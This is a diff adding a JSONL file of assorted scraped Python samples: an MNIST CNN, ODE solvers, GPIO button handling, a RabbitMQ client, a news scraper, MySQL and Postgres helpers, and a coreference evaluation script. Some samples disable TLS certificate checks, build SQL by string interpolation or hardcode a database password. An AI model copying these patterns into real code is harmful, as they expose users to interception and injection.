diff --git "a/4253.jsonl" "b/4253.jsonl" new file mode 100644--- /dev/null +++ "b/4253.jsonl" @@ -0,0 +1,621 @@ +{"seq_id":"193655161","text":"ctr = 0\nwhile(True):\n items = list(input())\n for i in range(len(items)):\n items[i] = items[i].upper()\n items = \"\".join(items).split(\" \")\n if(items[0] == \"EOI\"):\n break\n for i in range(len(items)):\n if(items[i] == \"NEMO\" or items[i] == \"NEMO,\"):\n ctr += 1\n if(ctr > 0):\n print(\"Found\")\n else:\n print(\"Missing\")\n ctr = 0 ","sub_path":"OneDrive/바탕 화면/알고리즘/10000~11000/10173.py","file_name":"10173.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"226549119","text":"#!/usr/bin/pyton\n# -*- coding: utf8 -*-\n\nx = 4\ndef var_scope_ex1():\n x = 5 # local variable shadow\n print(\"Local x :{0}\".format(x))\nvar_scope_ex1()\nprint(\"x : {0}\".format(x))\n\nz = 1\ndef var_scope_ex2():\n # not local variable z or y exist search global\n print(\"Local z not exit serch out scop z :{0}\".format(z))\n print(\"Local z not exit serch out scop y :{0}\".format(y))\ny = 2\nvar_scope_ex2()\n\n\ndef var_scope_ex3():\n print(w) # w not exist execute failed\n \nvar_scope_ex3()","sub_path":"opencv/2_var_scope_issue.py","file_name":"2_var_scope_issue.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"134082467","text":"import matplotlib.pyplot as plt\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nimport pandas as pd\n\nclass CNN:\n def __init__(self):\n np.random.seed(10)\n (self.x_Train, self.y_Train), (self.x_Test, self.y_Test) = mnist.load_data()\n #print('train data = ', len(x_train_image))\n #print('test data = ', len(x_test_image))\n self.model = Sequential()\n \n def run(self):\n # plot_images_labels_prediction(x_test_image, y_test_label, [], 0, 10)\n # print('x_train_image: ', x_train_image.shape)\n # print('y_train_label: ', y_train_label.shape)\n x_Train4D = self.x_Train.reshape(self.x_Train.shape[0], 28, 28, 1).astype('float32')\n x_Test4D = self.x_Test.reshape(self.x_Test.shape[0], 28, 28, 1).astype('float32')\n # print('x_train: ', x_Train.shape)\n # print('x_test: ', x_Test.shape)\n # print(x_train_image[0])\n x_Train4D_normalize = x_Train4D / 255\n x_Test4D_normalize = x_Test4D / 255\n # print( y_train_label[:5] )\n y_TrainOneHot = np_utils.to_categorical(self.y_Train)\n y_TestOneHot = np_utils.to_categorical(self.y_Test)\n # print(y_Train_OneHot[:5])\n # plot_image(x_train_image[0])\n # print(y_train_label[0])\n self.model.add(Conv2D(\n filters = 16,\n kernel_size = (5,5),\n padding = 'same',\n input_shape = (28,28,1),\n activation = 'relu'\n ))\n self.model.add(MaxPooling2D(pool_size=(2,2)))\n self.model.add(Conv2D(\n filters = 36,\n kernel_size = (5,5),\n padding = 'same',\n activation = 'relu'\n ))\n self.model.add(MaxPooling2D(pool_size=(2,2)))\n self.model.add(Dropout(0.25))\n self.model.add(Flatten())\n self.model.add(Dense(128, activation='relu'))\n self.model.add(Dropout(0.5))\n self.model.add(Dense(10, activation='softmax'))\n print(self.model.summary())\n self.model.compile(\n loss = 'categorical_crossentropy',\n optimizer = 'adam',\n metrics = ['accuracy'])\n train_history = self.model.fit(\n x = x_Train4D_normalize,\n y = y_TrainOneHot,\n validation_split = 0.2,\n epochs = 10,\n 
batch_size = 2300,\n verbose = 2)\n self.show_train_history(train_history, 'acc', 'val_acc')\n # show_train_history(train_history, 'loss', 'val_loss')\n scores = self.model.evaluate(x_Test4D_normalize, y_TestOneHot)\n print()\n print('accuracy = ', scores[1])\n prediction = self.model.predict_classes(x_Test4D_normalize)\n print()\n print()\n self.plot_images_labels_prediction(self.x_Test, self.y_Test, prediction, idx = 340)\n mtx = pd.crosstab(self.y_Test, \n prediction,\n colnames = ['predict'],\n rownames = ['label'])\n print(mtx)\n print()\n df = pd.DataFrame({'label': self.y_Test, 'predict': prediction})\n print( df[:2] )\n\n def plot_image(self, image):\n fig = plt.gcf()\n fig.set_size_inches(2,2)\n plt.imshow(image, cmap='binary')\n plt.show()\n\n def plot_images_labels_prediction(self, images, labels, prediction, idx, num=10):\n fig = plt.gcf()\n fig.set_size_inches(12,14)\n if num > 25: num=25\n for i in range(0,num):\n ax = plt.subplot(5, 5, 1+i)\n ax.imshow(images[idx], cmap='binary')\n \n title = 'lable=' + str(labels[idx])\n if len(prediction) > 0:\n title += ',predict=' + str(prediction[idx])\n \n ax.set_title(title, fontsize=10)\n ax.set_xticks([])\n ax.set_yticks([])\n idx += 1\n plt.show()\n\n def show_train_history(self, train_history, train, validation):\n plt.plot(train_history.history[train])\n plt.plot(train_history.history[validation])\n plt.title('Train History')\n plt.ylabel(train)\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc = 'upper left')\n plt.show()","sub_path":"models/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"581016571","text":"import viz, random\n\nviz.go()\n\n\nmale=viz.add('male.cfg')\nmale.translate(0,0,0.5)\nmale.rotate(0,1,0,180)\nface = male.face('leland_head.vzf')\n#face.setMorph(0,1)\n#face.setMorph(0,0)\n\nviz.MainWindow.clearcolor(viz.WHITE,0,0)","sub_path":"assets/avatars/Old Leland/leland test.py","file_name":"leland test.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"379488308","text":"def rk4( f, x0, t ):\r\n n = len( t )\r\n x = np.array( [ x0 ] * n )\r\n for i in xrange( n -1 ): \r\n h = t[i+1] - t[i]\r\n k1 = h*f( t[i], x[i]) \r\n k2 = h*f( t[i] + 0.5*h, x[i] + 0.5*k1)\r\n k3 = h*f( t[i] + 0.5*h, x[i] + 0.5 * k2)\r\n k4 = h*f( t[i] + h, x[i] + k3)\r\n x[i+1] = x[i] + (1./6.)*k1 + (1./3.)*k2 + (1./3.)*k3 + (1./6.)*k4\r\n\r\n return x\r\n\r\n\r\nimport numpy as np\r\n \r\ndef f(t, x):\r\n return 1./(2*(x-1))\r\n \r\nx0 = 1 + np.sqrt(0.001)\r\nt = np.linspace(0,4,12289)\r\nx_rk4 = rk4(f, x0, t)\r\n\r\ndef ForwardEuler(f, x0, t):\r\n n = len( t )\r\n x = np.array( [ x0 ] * n )\r\n for i in xrange( n -1 ):\r\n h = t[i+1] - t[i]\r\n x[i+1] = x[i] + h*f(t[i],x[i])\r\n \r\n return x\r\n\r\ndef f(t, x):\r\n return 1./(2*(x-1))\r\n\r\nx0 = 1 + np.sqrt(0.001)\r\nt = np.linspace(0,4,12289)\r\nx_ForwardEuler = ForwardEuler(f, x0, t)\r\ndef f(t):\r\n return 1 + np.sqrt(t + 0.001)\r\ny = f(t) \r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.plot(t,x_rk4, 'r-')\r\nplt.hold('on')\r\nplt.plot(t,x_ForwardEuler,'b-')\r\nplt.hold('on')\r\nplt.plot(t, y, 'k-') \r\nplt.legend(['4rth order Runge-Kutta method','Forward Euler scheme','y(x)'])\r\nplt.xlabel('x')\r\nplt.ylabel('y(x)')\r\nplt.title('Comparing ODE 
Methods')\r\nplt.savefig('tmp4.pdf')\r\nplt.show()\r\n\r\n","sub_path":"innlevering/xy_ODE_FE_vs_RK4.py","file_name":"xy_ODE_FE_vs_RK4.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"270031738","text":"#!/usr/bin/env python3\n\n# Documentation: https://sourceforge.net/p/raspberry-gpio-python/wiki/Inputs/\n\n\n\"\"\"\nfacendo diversi esperimenti non mi sto trovando affatto bene con la parte del modulo GPIO\nche aggancia le callback ai pulsanti.\nnonostante io stia usando i pullup interni e anche un condensatore esterno da 100nF comunque, stressando \nmolto il pulsante (premendolo e rilasciandolo a ripetizione) ci sono conportamenti strani per cui non detecta \nalcuni fronti di salita o di discesa.\n\nIn un futuro esperimento mi proverò ad usare un sistema più rudimentale ma magari più efficacie che legga lo stato del bottone di continuo\ne tenga eventualmente traccia di un timer per fare un debouncing automatico.\nun po' come la corrispondente classe di Arduino\n\"\"\"\n\n\nimport threading, readchar, time, sys\nimport RPi.GPIO as GPIO\n\ngpios = [40, 38, 36]\nstatus = [False, False, False]\n\ndef myOnPressCallback(channel):\n\tif GPIO.input(channel) == GPIO.LOW:\n\t\tprint(\"channel {} low\".format(channel) )\n\telif GPIO.input(channel) == GPIO.HIGH:\n\t\tprint(\"channel {} high\".format(channel) )\n\t\n\n\ndef main():\n\tGPIO.setmode( GPIO.BOARD )\n\tfor channel in gpios:\n\t\tprint( channel )\n\t\tGPIO.setup(channel, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\t\tGPIO.add_event_detect(channel, GPIO.BOTH, callback=myOnPressCallback, bouncetime=200)\n\t\t#GPIO.add_event_detect(channel, GPIO.RISING, callback=myOnReleaseCallback, bouncetime=5000)\n\t\t\n\twhile True:\n\t\tprint(\"gianni\")\n\t\ttime.sleep(1)\n\t\t\n\tGPIO.cleanup()\n\t\t\n\t\"\"\"\t\n\tmyThread = threading.Thread( target=checkInput )\n\tmyThread.start()\n\twhile True:\n\t\tif sharedVar:\n\t\t\tprint(\"Trying to quit\")\n\t\t\tquit()\n\t\telse:\n\t\t\tprint( \"main thread\" )\n\t\t\ttime.sleep(1)\n\t\"\"\"\n\t\n\t\nif __name__ == \"__main__\":\n\tsys.exit( main() )\n","sub_path":"_wip/_old/GPIO_inputs/main_old.py","file_name":"main_old.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"427833044","text":"\"\"\"\nModule for sending and receiving messages from RabbitMQ.\n\"\"\"\nfrom kombu import Connection, Exchange, Queue\nfrom kombu.utils import json\n\nfrom eiffelactory import config\n\nCFG = config.Config().rabbitmq\n\n\nclass RabbitMQConnection:\n \"\"\"\n Class handling receiving and publishing message on the RabbitMQ messages bus\n \"\"\"\n def __init__(self, message_callback):\n self.message_callback = message_callback\n\n self.exchange = Exchange(CFG.exchange)\n self.connection = Connection(transport='amqp',\n hostname=CFG.host,\n port=CFG.port,\n userid=CFG.username,\n password=CFG.password,\n virtual_host=CFG.vhost,\n ssl=True)\n\n self.connection.connect()\n self.producer = self.connection.Producer(serializer='json',\n auto_declare=True)\n self.queue = Queue(channel=self.connection.channel(),\n name=CFG.queue,\n routing_key=CFG.routing_key)\n self.queue.declare()\n self.queue.bind_to(exchange=Exchange(CFG.exchange),\n routing_key=CFG.routing_key)\n self.consumer = self.connection.\\\n Consumer(\n queues=self.queue,\n callbacks=[self._handle_message],\n prefetch_count=\n CFG.prefetch_count)\n self.consuming = True\n\n def 
_handle_message(self, body, message):\n \"\"\"\n Callback called by consumer.\n :param body:\n :param message:\n :return:\n \"\"\"\n # body is sometimes dict and sometimes str\n # make sure it's a json dict before passing it on\n json_body = dict()\n if isinstance(body, dict):\n json_body = body\n elif isinstance(body, str):\n json_body = json.loads(body)\n\n self.message_callback(json_body)\n message.ack()\n\n def publish_message(self, message):\n \"\"\"\n Publishes passed message on the RabbitMQ message bus\n :param message:\n :return:\n \"\"\"\n self.producer.publish(message,\n retry=True,\n retry_policy={\n 'interval_start': 0,\n 'interval_step': 2,\n 'interval_max': 30,\n 'max_retries': 30,\n },\n exchange=self.exchange,\n routing_key=CFG.routing_key)\n\n def read_messages(self):\n \"\"\"\n Method reading messages from the queue in a while-true loop.\n Callback is defined in __init__\n :return:\n \"\"\"\n with self.consumer:\n while self.consuming:\n self.connection.drain_events()\n\n def close_connection(self):\n \"\"\"\n Closes the channels/connections.\n :return:\n \"\"\"\n # for now called when you press Ctrl-C\n self.consuming = False\n self.producer.release()\n self.connection.release()\n","sub_path":"eiffelactory/rabbitmq.py","file_name":"rabbitmq.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"66719664","text":"#!/usr/bin/env python3\n\nimport logging\nimport json\nimport urllib.request\nfrom socket import timeout\nimport mongo_db_helper\nimport ssl\nimport re\nimport requests\nfrom io import BytesIO\nfrom PIL import Image\nfrom pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nimport sys\nfrom urllib.error import HTTPError\nfrom urllib.error import URLError\nfrom http.client import IncompleteRead\n\n# -*- coding: utf-8 -*-\n\nlogging.basicConfig(filename='fetch_data.log',level=logging.DEBUG)\n\ndef fetch_top_data():\n topStoriesTopData=mongo_db_helper.db.topStories.find_one()\n return topStoriesTopData\n\ndef fetch_data(item):\n text=fetch_text(item)\n img=fetch_img(item)\n if text == None :\n savetoTroubles(item)\n return None\n if img == None :\n savetoTroubles(item)\n return None\n new_data={'text':text,'img':img}\n item.update(new_data)\n \n return item\n\ndef fetch_text(item):\n connection=getConnection(item)\n if connection == None :\n return None\n contentConnection,connectionEncoding=readContent(connection)\n if connectionEncoding == 'application/pdf':\n text=\"Click on the link to read the news story.\"\n else :\n try:\n content = contentConnection.decode('utf-8')\n except Exception as e:\n logging.error(\"decode text error:\", str(e))\n return None\n soup = BeautifulSoup(content, \"html.parser\")\n patternText=mongo_db_helper.patternText\n contentText = re.findall(patternText,content)\n text=\"\"\n if not contentText:\n text=\"Click on the link to read the news story.\"\n else :\n paragraph = soup.findAll('p')\n for i in range(len(paragraph)):\n text=text + paragraph[i].get_text()\n return text\n\ndef getUrlImage(siteUrl,urlImages):\n size = 0\n count = 0\n if urlImages == None:\n urlImages=\"images/notFound.png\"\n elif not urlImages:\n urlImages=\"images/notFound.png\"\n else :\n if urlImages[0]!='h':\n urlImages=siteUrl + urlImages \n try:\n response = requests.get(urlImages, timeout=10)\n img = Image.open(BytesIO(response.content))\n except (HTTPError, URLError) as error:\n logging.error('Data not retrieved because %s\\nURL: %s', error, siteUrl)\n 
return None\n except timeout:\n logging.error('image socket timed out - URL %s', siteUrl)\n return None \n except Exception as e:\n logging.error(e)\n return None\n count=count+1\n if img.width > size:\n size=img.width\n urls=urlImages\n return urls\n \ndef fetch_img(item):\n urlImage=[]\n if 'url' in item:\n siteUrl = item['url']\n else : \n siteUrl = 'https://news.ycombinator.com/item?id=' + str(item['id'])\n connection=getConnection(item)\n if connection == None :\n return None\n contentConnection,connectionEncoding=readContent(connection)\n if connectionEncoding == 'application/pdf':\n img=\"Click on the link to read the news story.\"\n else :\n try:\n content = contentConnection.decode('utf-8')\n except Exception as e:\n logging.error(e)\n return None\n soup = BeautifulSoup(content, \"html.parser\")\n patternImg=mongo_db_helper.patternImg\n contentImg = re.findall(patternImg,content)\n img=\"\"\n if not contentImg:\n img=\"images/notFound.png\"\n else :\n images = soup.findAll('img')\n for i in range(len(images)):\n if images[i].get('src') != None:\n urlImage.append(images[i].get('src'))\n for j in range(len(urlImage)):\n img = getUrlImage(siteUrl,urlImage[j])\n return img\n\ndef save_data():\n topStoriesTopData=fetch_top_data()\n topStoriesJsonData=fetch_data(topStoriesTopData)\n if topStoriesJsonData == None :\n return None\n mongo_db_helper.db.hackerNewsData.insert(topStoriesJsonData)\n mongo_db_helper.db.topStories.remove({'id':topStoriesJsonData['id']})\n\ndef save_data_all():\n if mongo_db_helper.db.topStories.count() == 0:\n print(\"Bitti\")\n else: \n save_data()\n save_data_all()\n\ndef getConnection(item):\n headers= mongo_db_helper.headers\n url = mongo_db_helper.url\n if 'url' in item:\n urlcontent=item['url']\n else:\n urlcontent='https://news.ycombinator.com/item?id=' + str(item['id'])\n request=url.Request(urlcontent,None,headers)\n context = ssl._create_unverified_context()\n try : \n connection = url.urlopen(request, timeout=10, context=context)\n except (HTTPError, URLError) as error:\n logging.error('Data not retrieved because %s\\nURL: %s', error, urlcontent)\n pass\n except timeout:\n logging.error('socket timed out - URL %s', urlcontent)\n pass\n except IncompleteRead:\n pass\n else :\n print('Access successful.')\n return connection\n\ndef readContent(connection):\n if connection == None :\n pass\n else :\n content = connection.read()\n http_message=connection.info()\n connection_encoding = http_message.get_content_type() \n return content,connection_encoding\n \ndef savetoTroubles(item) :\n mongo_db_helper.db.troubleMaker.insert(item)\n mongo_db_helper.db.topStories.remove({'id':item['id']})\n \nmongo_db_helper.mongoControl()\nsave_data_all()\n","sub_path":"fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"10519303","text":"import db_conn # db_conn.py 불러오기\nimport pymysql\nfrom time import time\nfrom datetime import datetime\n\n# 유저의 계측기 정보들을 가져옵니다.\ndef get_device_list():\n conn = db_conn.get_connection()\n sql ='select * from device inner join building_type on device.device_building_type = building_type.building_type where device_user_id=1'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql)\n rows = cursor.fetchall()\n conn.close()\n return rows\n\n# 유저의 계측기 정보들을 가져옵니다.\ndef get_data():\n conn = db_conn.get_connection()\n sql ='SELECT CAST(UNIX_TIMESTAMP(Create_time)/3600 AS SIGNED) 
,FROM_UNIXTIME(CAST(UNIX_TIMESTAMP(Create_time)/3600 AS SIGNED)*3600) AS tDate ,COUNT(*) cnt, AVG(Longitude), AVG(Latitude), AVG(Height), device_id FROM rawdata_ulsan WHERE Create_time BETWEEN \"2021-04-29 15:15:00\" AND \"2021-04-30 23:59:59\" AND device_id=2214 GROUP BY 1'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql)\n rows = cursor.fetchall()\n conn.close()\n print(rows)\n return rows\n# 1.개별 계측기에 대한 기본정보\ndef all_device_info():\n conn = db_conn.get_connection()\n sql ='select device.device_location,user.user_phone_number,device.device_latitude,device.device_longitude,device.device_height from device inner join user on user.user_id= device.device_user_id '\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql)\n rows = cursor.fetchall()\n conn.close()\n return rows\n# 2.해당 건물에 위치한 또다른 계측기를 볼 수 있도록 \ndef each_device_building(login_user_id,building_name):\n conn = db_conn.get_connection()\n sql ='select distinct(device_id) from device LEFT JOIN building ON device.building_name=building.building_name where device.device_user_id=%s and device.building_name = %s'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n values = (login_user_id,building_name)\n cursor.execute(sql,values)\n infos = cursor.fetchall()\n conn.close()\n return infos\n\n\ndef each_device_info(device_id):\n conn = db_conn.get_connection()\n sql ='select device.device_criteria_latitude, device.device_criteria_height, device.device_criteria_longitude, device.device_criteria_latitude_min, device.device_criteria_longitude_min, device.device_criteria_height_min, device.device_location,user.user_phone_number,device.device_latitude,device.device_longitude,device.device_height from device inner join user on user.user_id= device.device_user_id where device.device_id=%s'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql,device_id)\n rows = cursor.fetchall()\n conn.close()\n return rows\n\n# 모든 사용자의 총 계측기 개수\ndef get_all_device():\n conn = db_conn.get_connection()\n sql ='select count(distinct(device_id)) from device'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql)\n counts = cursor.fetchall()\n conn.close()\n return counts\n# 로그인 후 나의 계측기 개수// 예외처리필요??\ndef get_my_device(login_user_id):\n conn = db_conn.get_connection()\n sql ='select count(distinct(device_id)) from device INNER JOIN user ON device_user_id = %s'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql,login_user_id)\n counts = cursor.fetchall()\n conn.close()\n return counts\n\n# 계측기 등록하기 (/register) // 구조물이름, 구조물종류,구조물 주소, 계측기 번호(device_id), 계측기 위치\ndef index_find_device():\n conn = db_conn.get_connection()\n sql_select = 'select MAX(id) from device'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql_select)\n id_idx = cursor.fetchone()\n conn.close()\n return id_idx\ndef index_find_building():\n conn = db_conn.get_connection()\n sql_select = 'select MAX(id) from building'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql_select)\n id_idx = cursor.fetchone()\n conn.close()\n return id_idx\n\ndef register_my_device(login_user_id,b_name,b_type,b_addr,d_id,d_name,d_loc):\n lat,long,height = d_loc.split('/')\n t_date = datetime.today().date()\n print(t_date)\n conn = db_conn.get_connection()\n max_id = index_find_device()['MAX(id)'] +1\n sql_insert ='insert into device values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'\n values = 
(max_id,d_id,d_name,login_user_id,t_date,pymysql.NULL,100,100,100,b_type,b_addr,b_name,float(lat),float(long),float(height),0,0,0,'정상')\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql_insert,values)\n conn.commit()\n conn.close()\n\ndef register_device_to_building(login_user_id,b_name,b_type,b_addr):\n conn = db_conn.get_connection()\n max_id = index_find_building()['MAX(id)'] +1\n sql_find = 'select building_type_name from building_type where building_type = %s'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql_find,b_type)\n b_type_name = cursor.fetchone()\n sql_insert ='insert into building values (%s,%s,%s,%s,%s,%s,%s)'\n values = (max_id,b_addr,b_type,b_type_name['building_type_name'],b_name,login_user_id,'정상')\n cursor.execute(sql_insert,values)\n conn.commit()\n conn.close()\n \n\n\n","sub_path":"flask_code/device_data_dao.py","file_name":"device_data_dao.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"38413509","text":"from re import split\nfrom sys import stderr\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport psycopg2\n\n\nconnection = psycopg2.connect(\n dbname = 'postgres',\n user = 'postgres',\n password = 'liazat123',\n host = 'localhost'\n)\ncursor = connection.cursor()\n\nitc_page = requests.get(\n url='https://www.itc.kg/'\n)\ndata = bs(itc_page.text, 'html.parser')\n\nsection = data.find('section', attrs={\"id\": \"service\"})\nall_col_md_4 = section.find_all('div', class_=\"col-md-4\")\n\n\nfor col in all_col_md_4:\n name = col.h2.get_text()\n\n definition = col.p.text.strip().split('\\n')\n\n if definition[-1] == 'Подробнее':\n definition.pop(-1)\n\n description = ' '.join([i.strip() for i in definition])\n\n # print(description)\n\n\n a = f'''INSERT INTO parser (name, text)\n VALUES (\\'{name}\\', \\'{description}\\');'''\n\n # cursor.execute(a)\n # connection.commit()\n \n\n\ncreate = '''CREATE TABLE parser(\n user_id SERIAL PRIMARY KEY,\n name VARCHAR(250) NOT NULL,\n text VARCHAR(250) NOT NULL\n);'''\n# cursor.execute(create)\n# cursor.connection.commit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"344312170","text":"# 三方包\nimport os\nimport sys\nimport json\nimport random\nimport subprocess\nimport numpy as np\nimport _pickle as cPickle # python3之后,cPickle包改名成了_pickle\nimport logging\nimport argparse\nimport torch\n\n# 本地包\nimport src.shared.eval_utils\nimport src.all_models.model_utils\nimport src.shared.classes as classes\n\nprint(os.getcwd())\n# print(\"环境变量:\", os.environ[\"PATH\"], \"\\n\")\n\n'''\n# 把\"工作路径/src\"下的文件都加入搜索路径\nfor pack in os.listdir(\"src\"): # 遍历\"工作路径/src\"下的文件\n # 把每个文件加入到包的搜索路径\n sys.path.append(os.path.join(\"src\", pack))\n'''\n# 把项目根路径添加到模块搜索路径中\nprojectRootPath = os.path.abspath(os.path.join(__file__, \"..\", \"..\"))\nsys.path.append(projectRootPath)\n\n'''\n因为现有数据在序列化的时候是用的classes.Topic等名字,而现在是src.shared.classes.Topic等\n名字,不能对应,你反序列化之后识别不了。所以权宜之计是先按原来的方法import一遍\n'''\nsys.path.append(os.path.abspath(os.path.join(projectRootPath, \"shared\")))\nfrom src.shared.classes import *\n\n# 配置参数:命令行参数解器\nparser = argparse.ArgumentParser(description='Testing the regressors')\nparser.add_argument('--config_path', type=str, help=' The path configuration json 
file')\nparser.add_argument('--out_dir', type=str, help=' The directory to the output folder')\n# 进行参数解析,结果存入配置参数列表\nargs = parser.parse_args()\n\n# 根据out_dir参数,创建输出路径(如果不存在)\nif not os.path.exists(args.out_dir):\n os.makedirs(args.out_dir)\n\n# 根据config_path参数,读取配置文件(test_config.json)\nwith open(args.config_path, 'r') as js_file:\n config_dict = json.load(js_file)\n print(config_dict)\n\n# 把当前配置文件序列化为json保存在输出路径(test_config.json)\nwith open(os.path.join(args.out_dir,'test_config.json'), \"w\") as js_file:\n json.dump(config_dict, js_file, indent=4, sort_keys=True)\n\n# 配置参数:是否使用cuda\nif config_dict[\"gpu_num\"] != -1: # gpu_num为-1表示不想使用cuda\n # 新增环境变量\n os.environ[\"CUDA_VISIBLE_DEVICES\"]= str(config_dict[\"gpu_num\"])\n # 新增配置参数\n use_cuda = True\nelse: # gpu_num为其他表示想使用cuda\n use_cuda = False\n# 只有当配置文件中要求使用cuda,且cuda确实可用时,才使用cuda\nuse_cuda = use_cuda and torch.cuda.is_available()\nif use_cuda:\n print('使用cuda,cuda版本:')\n os.system(\"nvcc --version\")\nelse:\n print(\"不使用cuda\")\n\n# 配置random\nrandom.seed(config_dict[\"random_seed\"])\n\n# 配置numpy\nnp.random.seed(config_dict[\"random_seed\"])\n\n# 配置pytorch\ntorch.manual_seed(config_dict[\"seed\"])\nif use_cuda:\n torch.cuda.manual_seed(config_dict[\"seed\"])\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n# 配置logger\nlogging.basicConfig(\n # 使用fileHandler,日志文件在输出路径中(test_log.txt)\n filename=os.path.join(args.out_dir, \"test_log.txt\"),\n filemode=\"w\",\n # 配置日志级别\n level=logging.INFO\n)\n\n\ndef read_conll_f1(filename):\n '''\n This function reads the results of the CoNLL scorer , extracts the F1 measures of the MUS,\n B-cubed and the CEAF-e and calculates CoNLL F1 score.\n :param filename: a file stores the scorer's results.\n :return: the CoNLL F1\n '''\n f1_list = []\n with open(filename, \"r\") as ins:\n for line in ins:\n new_line = line.strip()\n if new_line.find('F1:') != -1:\n f1_list.append(float(new_line.split(': ')[-1][:-1]))\n\n muc_f1 = f1_list[1]\n bcued_f1 = f1_list[3]\n ceafe_f1 = f1_list[7]\n\n return (muc_f1 + bcued_f1 + ceafe_f1)/float(3)\n\n\ndef run_conll_scorer():\n if config_dict[\"test_use_gold_mentions\"]:\n event_response_filename = os.path.join(args.out_dir, 'CD_test_event_mention_based.response_conll')\n entity_response_filename = os.path.join(args.out_dir, 'CD_test_entity_mention_based.response_conll')\n else:\n event_response_filename = os.path.join(args.out_dir, 'CD_test_event_span_based.response_conll')\n entity_response_filename = os.path.join(args.out_dir, 'CD_test_entity_span_based.response_conll')\n\n event_conll_file = os.path.join(args.out_dir,'event_scorer_cd_out.txt')\n entity_conll_file = os.path.join(args.out_dir,'entity_scorer_cd_out.txt')\n\n event_scorer_command = ('perl scorer/scorer.pl all {} {} none > {} \\n'.format\n (config_dict[\"event_gold_file_path\"], event_response_filename, event_conll_file))\n\n entity_scorer_command = ('perl scorer/scorer.pl all {} {} none > {} \\n'.format\n (config_dict[\"entity_gold_file_path\"], entity_response_filename, entity_conll_file))\n\n processes = []\n print('Run scorer command for cross-document event coreference')\n processes.append(subprocess.Popen(event_scorer_command, shell=True))\n\n print('Run scorer command for cross-document entity coreference')\n processes.append(subprocess.Popen(entity_scorer_command, shell=True))\n\n while processes:\n status = processes[0].poll()\n if status is not None:\n processes.pop(0)\n\n print ('Running scorers has been done.')\n print ('Save results...')\n\n scores_file = 
open(os.path.join(args.out_dir, 'conll_f1_scores.txt'), 'w')\n\n event_f1 = read_conll_f1(event_conll_file)\n entity_f1 = read_conll_f1(entity_conll_file)\n scores_file.write('Event CoNLL F1: {}\\n'.format(event_f1))\n scores_file.write('Entity CoNLL F1: {}\\n'.format(entity_f1))\n\n scores_file.close()\n\n\ndef test_model(test_set: src.shared.classes.Corpus):\n r\"\"\"\n Loads trained event and entity models and test them on the test set\n\n :param test_set: 测试数据\n \"\"\"\n # 加载设备\n if use_cuda:\n cudan = \"cuda:\"+str(config_dict[\"gpu_num\"])\n device = torch.device(cudan)\n else:\n device = torch.device(\"cpu\")\n # 加载模型\n if use_cuda: # 训练模型时使用的是0号GPU,现在使用n号GPU,需要转换\n cd_event_model = torch.load(config_dict[\"cd_event_model_path\"], map_location={'cuda:0': cudan})\n cd_entity_model = torch.load(config_dict[\"cd_entity_model_path\"], map_location={'cuda:0': cudan})\n else: # 训练模型时使用的是0号GPU,现在使用CPU,需要转换\n cd_event_model = torch.load(config_dict[\"cd_event_model_path\"], map_location={'cuda:0': 'cpu'})\n cd_entity_model = torch.load(config_dict[\"cd_entity_model_path\"], map_location={'cuda:0': 'cpu'})\n # 把模型放到设备中\n cd_event_model.to(device)\n cd_entity_model.to(device)\n\n # 加载外部wd ec结果\n doc_to_entity_mentions = src.all_models.model_utils.load_entity_wd_clusters(config_dict)\n\n # 算法主体(数据,模型)\n _,_ = src.all_models.model_utils.test_models(test_set, cd_event_model, cd_entity_model,\n device, config_dict, write_clusters=True,\n out_dir=args.out_dir,\n doc_to_entity_mentions=doc_to_entity_mentions,\n analyze_scores=True)\n\n run_conll_scorer()\n\n\ndef main():\n \"\"\"\n This script loads the trained event and entity models and test them on the test set\n 